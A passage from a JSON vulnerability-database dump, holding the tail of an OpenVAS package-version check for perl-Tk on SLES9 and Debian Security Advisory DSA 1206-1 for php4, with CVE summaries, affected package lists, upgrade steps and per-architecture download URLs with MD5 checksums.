script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_name(\"SLES9: Security update for perl-Tk\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"perl-Tk\", rpm:\"perl-Tk~800.024~429.4\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:12:56", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-xslt_4:4.3.10-18_all.deb", "packageName": "php4-xslt", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-ldap_4:4.3.10-18_all.deb", "packageName": "php4-ldap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-pear_4:4.3.10-18_all.deb", "packageName": "php4-pear", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "libapache2-mod-php4_4:4.3.10-18_all.deb", "packageName": "libapache2-mod-php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-gd_4:4.3.10-18_all.deb", "packageName": "php4-gd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-imap_4:4.3.10-18_all.deb", "packageName": "php4-imap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-domxml_4:4.3.10-18_all.deb", "packageName": "php4-domxml", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-cli_4:4.3.10-18_all.deb", "packageName": "php4-cli", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4_4:4.3.10-18_all.deb", "packageName": "php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-recode_4:4.3.10-18_all.deb", "packageName": "php4-recode", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-odbc_4:4.3.10-18_all.deb", "packageName": "php4-odbc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-dev_4:4.3.10-18_all.deb", "packageName": "php4-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-common_4:4.3.10-18_all.deb", "packageName": "php4-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-mcal_4:4.3.10-18_all.deb", "packageName": "php4-mcal", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "libapache-mod-php4_4:4.3.10-18_all.deb", "packageName": "libapache-mod-php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-mhash_4:4.3.10-18_all.deb", "packageName": "php4-mhash", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-snmp_4:4.3.10-18_all.deb", "packageName": "php4-snmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-sybase_4:4.3.10-18_all.deb", "packageName": "php4-sybase", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-curl_4:4.3.10-18_all.deb", "packageName": "php4-curl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-cgi_4:4.3.10-18_all.deb", "packageName": "php4-cgi", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-18", "arch": "all", "packageFilename": "php4-mysql_4:4.3.10-18_all.deb", "packageName": "php4-mysql", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1206-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nNovember 6th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php4\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3353 CVE-2006-3017 CVE-2006-4482 CVE-2006-5465\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2005-3353\n\n Tim Starling discovered that missing input sanitising in the EXIF\n module could lead to denial of service.\n\nCVE-2006-3017\n\n Stefan Esser discovered a security-critical programming error in the\n hashtable implementation of the internal Zend engine.\n\nCVE-2006-4482\n\n It was discovered that str_repeat() and wordwrap() functions perform\n insufficient checks for buffer boundaries on 64 bit systems, which\n might lead to the execution of arbitrary code.\n\nCVE-2006-5465\n\n Stefan Esser discovered a buffer overflow in the htmlspecialchars()\n and htmlentities(), which might lead to the execution of arbitrary\n code.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 4:4.3.10-18. Builds for hppa and m68k will be provided later\nonce they are available.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4:4.4.4-4 of php4 and version 5.1.6-6 of php5.\n\nWe recommend that you upgrade your php4 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.dsc\n Size/MD5 checksum: 1686 b99c2dd2804c2bbc49e2ddf4552cc80c\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.diff.gz\n Size/MD5 checksum: 280816 86bdd61412df9ca0b87a5f5aa536a610\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz\n Size/MD5 checksum: 4892209 73f5d1f42e34efa534a09c6091b5a21e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-18_all.deb\n Size/MD5 checksum: 250000 8d364cb47cfbb8bb2472ca47812123e3\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18_all.deb\n Size/MD5 checksum: 1144 26260bbbf8804b071cdf75ce70bde876\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_alpha.deb\n Size/MD5 checksum: 1700934 1deff9409b11b01a88a805ca8726d3c3\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_alpha.deb\n Size/MD5 checksum: 1698672 d91afe4bf274a9abc1227747765be8ca\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_alpha.deb\n Size/MD5 checksum: 3464908 2d3ac8b65a2650bbc60327043bb74cfa\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_alpha.deb\n Size/MD5 checksum: 1743098 0228c6cb6f305f473d0df08c61bfe10f\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_alpha.deb\n Size/MD5 checksum: 167916 02f6e85f6e12684c41f16cf908aa2a0e\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_alpha.deb\n Size/MD5 checksum: 18148 3aa1ca7f556608a37d8dc6442cbc244e\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_alpha.deb\n Size/MD5 checksum: 325200 7126e4aa1ca42fd6e04a72ba782dc2e0\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_alpha.deb\n Size/MD5 checksum: 39036 28fc28ae9bf2b4ab091b7ae6687b027d\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_alpha.deb\n Size/MD5 checksum: 34552 daa6539117567a4fffd1c8196426b3d7\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_alpha.deb\n Size/MD5 checksum: 38060 026c1fdd47d1cc9ff426427d5e04e5c6\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_alpha.deb\n Size/MD5 checksum: 21378 01d0e1b4abc53a4aff236bae15a3021c\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_alpha.deb\n Size/MD5 checksum: 18210 ebb9a131438cd54cd636fab7db1b3293\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_alpha.deb\n Size/MD5 checksum: 8340 29dda4814444739effce591f24f4b3da\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_alpha.deb\n Size/MD5 checksum: 22454 344307b6d30996a6fc9bcffab5ea163d\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_alpha.deb\n Size/MD5 checksum: 28368 114065def6bdf90c16fc60e8c087dfec\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_alpha.deb\n Size/MD5 checksum: 7964 4b614f3bfa16346d449bcbee71c58d75\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_alpha.deb\n Size/MD5 checksum: 13770 6f8c4f516e744ed9daf4157df9112fa6\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_alpha.deb\n Size/MD5 checksum: 23304 644e7764688b5d9305cf9bb625ae6747\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_alpha.deb\n Size/MD5 checksum: 17886 a01178a81b43e0fd909a16a81695832b\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_amd64.deb\n Size/MD5 checksum: 1660608 2dcf0c9a7c99609665f54d571628bc4f\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_amd64.deb\n Size/MD5 checksum: 1658062 009757f161f1ff3bd3fc29bee44d6e17\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_amd64.deb\n Size/MD5 checksum: 3277740 76ee9926ad67aa6dd666edb59a590adf\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_amd64.deb\n Size/MD5 checksum: 1648188 3b40796e964ee6eab1e06a1a76029ef1\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_amd64.deb\n Size/MD5 checksum: 167920 0064aba32b455b870848cf0c151ed93f\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_amd64.deb\n Size/MD5 checksum: 17834 d44cba2553a65d00f844d964615c2f0c\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_amd64.deb\n Size/MD5 checksum: 325184 f21e0e6afe5835083193c3039ab5fdfc\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_amd64.deb\n Size/MD5 checksum: 40802 9ccd024e9fb5f70aa3ecc3d4c0fe8531\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_amd64.deb\n Size/MD5 checksum: 34286 781c66281eb08f129aae64d806cb42b1\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_amd64.deb\n Size/MD5 checksum: 37650 a0c129d1e47883a244199e553c637581\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_amd64.deb\n Size/MD5 checksum: 21412 7de677bfdae7ac19f663f878a00dcb40\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_amd64.deb\n Size/MD5 checksum: 18884 bb82e2d09986e4f76e64b05d27f26dd5\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_amd64.deb\n Size/MD5 checksum: 8244 1ede17004a053a4d66f541e580fcf56d\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_amd64.deb\n Size/MD5 checksum: 22890 83c5c86e1c9e4260cdf68048b8a4052b\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_amd64.deb\n Size/MD5 checksum: 28784 c717f11defbfd27a151035510efae669\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_amd64.deb\n Size/MD5 checksum: 7908 9a89b18ed52654643c368b8374494940\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_amd64.deb\n Size/MD5 checksum: 13672 aadb8c935c6cfc0940ebca26f74a8f66\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_amd64.deb\n Size/MD5 checksum: 22434 904489e90619114f29a371c175b81e7d\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_amd64.deb\n Size/MD5 checksum: 17570 08b245b8e01cb69806b8e453a7ec6234\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_arm.deb\n Size/MD5 checksum: 1591974 afdd3c988badd5c2751e364f77987dbb\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_arm.deb\n Size/MD5 checksum: 1591786 a2ea48b3394a081b42eb5f680f29ef72\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_arm.deb\n Size/MD5 checksum: 3171516 07df6b074d821e4a61396964050ded20\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_arm.deb\n Size/MD5 checksum: 1593088 0703edb2b7348ebf2a4d072e1b52b3bc\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_arm.deb\n Size/MD5 checksum: 167938 0934b0061b9aa706a2e33a47d270508a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_arm.deb\n Size/MD5 checksum: 17646 adba08080702e089bffba483a9de1035\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_arm.deb\n Size/MD5 checksum: 325468 10b04c3f5e58e3c0a8ca1122f7afb518\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_arm.deb\n Size/MD5 checksum: 36114 474494efb516b9cbc403e809df4e419c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_arm.deb\n Size/MD5 checksum: 31782 2f3485924aabf2da12ff9a6c15826abb\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_arm.deb\n Size/MD5 checksum: 35384 d4c458352a00c5c2b93c0ea7db3c47fa\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_arm.deb\n Size/MD5 checksum: 19736 64ecf4479384d29a420873bcd3f89a65\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_arm.deb\n Size/MD5 checksum: 17086 8a5ee897db51d1ef44613dad242b51ea\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_arm.deb\n Size/MD5 checksum: 7814 fe2c30426aaaffe72d8ca0151702bc96\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_arm.deb\n Size/MD5 checksum: 20598 88b93b4216656b50fc52b2022f7d1d3a\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_arm.deb\n Size/MD5 checksum: 27324 e0498ee38ead720b3c8592a1bdc41224\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_arm.deb\n Size/MD5 checksum: 7640 52bdb48050f3b8c2d569bbfca236d0ea\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_arm.deb\n Size/MD5 checksum: 12794 c9642636475261fe406ffcc81ed9be4e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_arm.deb\n Size/MD5 checksum: 20888 8742826563b883e2e761afc44788c027\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_arm.deb\n Size/MD5 checksum: 15792 79495683d81c4cb9063b5c13b94c4547\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_i386.deb\n Size/MD5 checksum: 1614232 572e82d2d3c8e9299fc27fb3da1be573\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_i386.deb\n Size/MD5 checksum: 1611996 3eb79568d85b2154e07fbc7c8a71ab99\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_i386.deb\n Size/MD5 checksum: 3208898 822b7d30ae417ca4cca7a959d33967c0\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_i386.deb\n Size/MD5 checksum: 1609468 354276638d467776e026a9b95a1acb60\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_i386.deb\n Size/MD5 checksum: 167936 cf408f6af1e686a1b9a9a33e59341bb5\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_i386.deb\n Size/MD5 checksum: 17902 3a863a5c7f7540aa01e53ff817affeca\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_i386.deb\n Size/MD5 checksum: 325168 3cccbdc82dd6ef063746c691cb5d063f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_i386.deb\n Size/MD5 checksum: 37234 0fbaff4f5b3bcc2ff27ea25ef377f7d8\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_i386.deb\n Size/MD5 checksum: 32390 a5110ec9f8e82505613bceb78341a829\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_i386.deb\n Size/MD5 checksum: 37370 fd429c6203e71101cd628e4ac040087b\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_i386.deb\n Size/MD5 checksum: 19960 8384a96bc96147a83ad05a5ec5f2cfd3\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_i386.deb\n Size/MD5 checksum: 17676 90a2ffebe127c8c672b2f43cc9fddfcf\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_i386.deb\n Size/MD5 checksum: 8040 e7ee51f0cd7fcb8a66c29a58837509df\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_i386.deb\n Size/MD5 checksum: 21218 00f174cd3965a23abcccccc3bcfa2200\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_i386.deb\n Size/MD5 checksum: 27146 e84270ecde6cae6a3b4bbdd36bb86c3d\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_i386.deb\n Size/MD5 checksum: 7700 a58a6b0579b26459afb478462ee31519\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_i386.deb\n Size/MD5 checksum: 13158 a508e1dc78f5fda5c3dd2ad19360fe0d\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_i386.deb\n Size/MD5 checksum: 21376 ec7bd84b0e3b1d1cc17355c474486cbb\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_i386.deb\n Size/MD5 checksum: 16396 c141d3d2498cc3391f32232b95cb196a\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_ia64.deb\n Size/MD5 checksum: 1952128 ced874b90ed36a7843a56303a8a04522\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_ia64.deb\n Size/MD5 checksum: 1949382 4cc9f82fe65d380bab127178b3b5f08c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_ia64.deb\n Size/MD5 checksum: 3895128 43c19f3ab0f53e5371595520b2f7d1e7\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_ia64.deb\n Size/MD5 checksum: 1949590 cc7d7eff9e324c31ebec2112345821ef\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_ia64.deb\n Size/MD5 checksum: 167916 d17b9aa8fc429e41ad6b7393977af93a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_ia64.deb\n Size/MD5 checksum: 22022 ae3a31d8f477eb69650c9d88f7271788\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_ia64.deb\n Size/MD5 checksum: 325196 4d7e3dd0d060056bc20198f3d5ead646\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_ia64.deb\n Size/MD5 checksum: 50632 7368a6ef6bd8e41bf7a3e905a448660c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_ia64.deb\n Size/MD5 checksum: 45248 0b2cc6364099fe906820c8043f565629\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_ia64.deb\n Size/MD5 checksum: 48216 44a538ecbe3760c449e6898fcd9f02a8\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_ia64.deb\n Size/MD5 checksum: 27026 8ea2a8c41ce29715747457503714a76b\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_ia64.deb\n Size/MD5 checksum: 22648 e6edbf30d910de441c2e080695612a71\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_ia64.deb\n Size/MD5 checksum: 9324 2d056ffa84d4d37195cc38c395e4ddec\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_ia64.deb\n Size/MD5 checksum: 27598 4e228c68bd22099f414cfc34794a422e\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_ia64.deb\n Size/MD5 checksum: 36170 8d23bb4db75de14272daa22e543a8adc\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_ia64.deb\n Size/MD5 checksum: 9004 345581f1565d77212bff7dec007322a1\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_ia64.deb\n Size/MD5 checksum: 16328 5e96eab77cd21d2ad0074c791429488e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_ia64.deb\n Size/MD5 checksum: 28870 fe208dfb33c64c60888da4ae676eca01\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_ia64.deb\n Size/MD5 checksum: 21896 0ae7872423bcddb068506be60a592e02\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_mips.deb\n Size/MD5 checksum: 1648412 b22897e5386936f5e0c3e534d0ef4edc\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_mips.deb\n Size/MD5 checksum: 1646484 bde0d663e4b088ca096707dbd5ea085e\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_mips.deb\n Size/MD5 checksum: 3295390 e7ba986c31963686d61cb4e6e7ab0fb1\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_mips.deb\n Size/MD5 checksum: 1652314 7b1146db3f44d0756ab8ba581d91204a\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_mips.deb\n Size/MD5 checksum: 167932 f0f0d7221606384be034a43584f6c130\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_mips.deb\n Size/MD5 checksum: 16826 26ea16ea5120b002899cb096fb339e04\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_mips.deb\n Size/MD5 checksum: 325300 4e7913d8409c58e8d440e222d9bbbaeb\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_mips.deb\n Size/MD5 checksum: 35224 c35ca59240f075ee1ad544771e82f52d\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_mips.deb\n Size/MD5 checksum: 31930 94ef5618ceaed84a592d5323f25b503c\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_mips.deb\n Size/MD5 checksum: 33966 1e3af07adb4c1d335115fadca331a3a9\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_mips.deb\n Size/MD5 checksum: 19920 2446320de817c5de6df458cd04b84458\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_mips.deb\n Size/MD5 checksum: 16478 daf3946631fc385d2ae3200a84a9e6a7\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_mips.deb\n Size/MD5 checksum: 8116 9c12d49a7546cb73d12ce943a0c62ab9\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_mips.deb\n Size/MD5 checksum: 20510 c65e0863274f9e341f5085c3cf693ea2\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_mips.deb\n Size/MD5 checksum: 26372 f631fadcf8aaf2cde32cc9f34cf9ef62\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_mips.deb\n Size/MD5 checksum: 7824 8deeeadd18e998e42dcd4c57fb86db7b\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_mips.deb\n Size/MD5 checksum: 13152 9449dc1c15a0b9771b08edb99ac7817c\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_mips.deb\n Size/MD5 checksum: 21652 2135a7a2354a4d6009105258cd2cb833\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_mips.deb\n Size/MD5 checksum: 16192 6747f81d0d4ccbd501053f68da3ac259\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 1630250 9a406a4362e3a8bce8ab0893f1b3fc1e\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 1628592 8ff9ec915fd228bab715b4126f0624f8\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 3253842 d9101ff31106d55f1361a1aea4da796e\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 1631568 92d31cf18ff2138026e9412d5a8c1df6\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 167940 46e1e1fed86610fc6a01580eb305e9da\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 16794 508b3379bef4e8d7ce31dfc235a11702\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 325300 aebcf44cf3ec1a9f5d57254d58240a2f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 34776 bcb4cd6a3606ee5a069328928a466b1b\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 31662 5b371eb869cab39bc263dec252b24d46\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 33836 79365af49433d2a52fa84eb83e13ff18\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 19802 c7271c289d897c487b9ad2b9d3c8c848\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 16388 ab9a58b595aa4da0edb92d8907b3abd4\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 8088 af3bb195ba0f355539c95e512dacaa1b\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 20452 f59bc05f9fe9806a5e96245629444ae8\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 26242 495d0af0489ef27a27fb803df9c22f9c\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 7772 c0e91e320dc7aa8612cb7ffcf67ff6f4\n 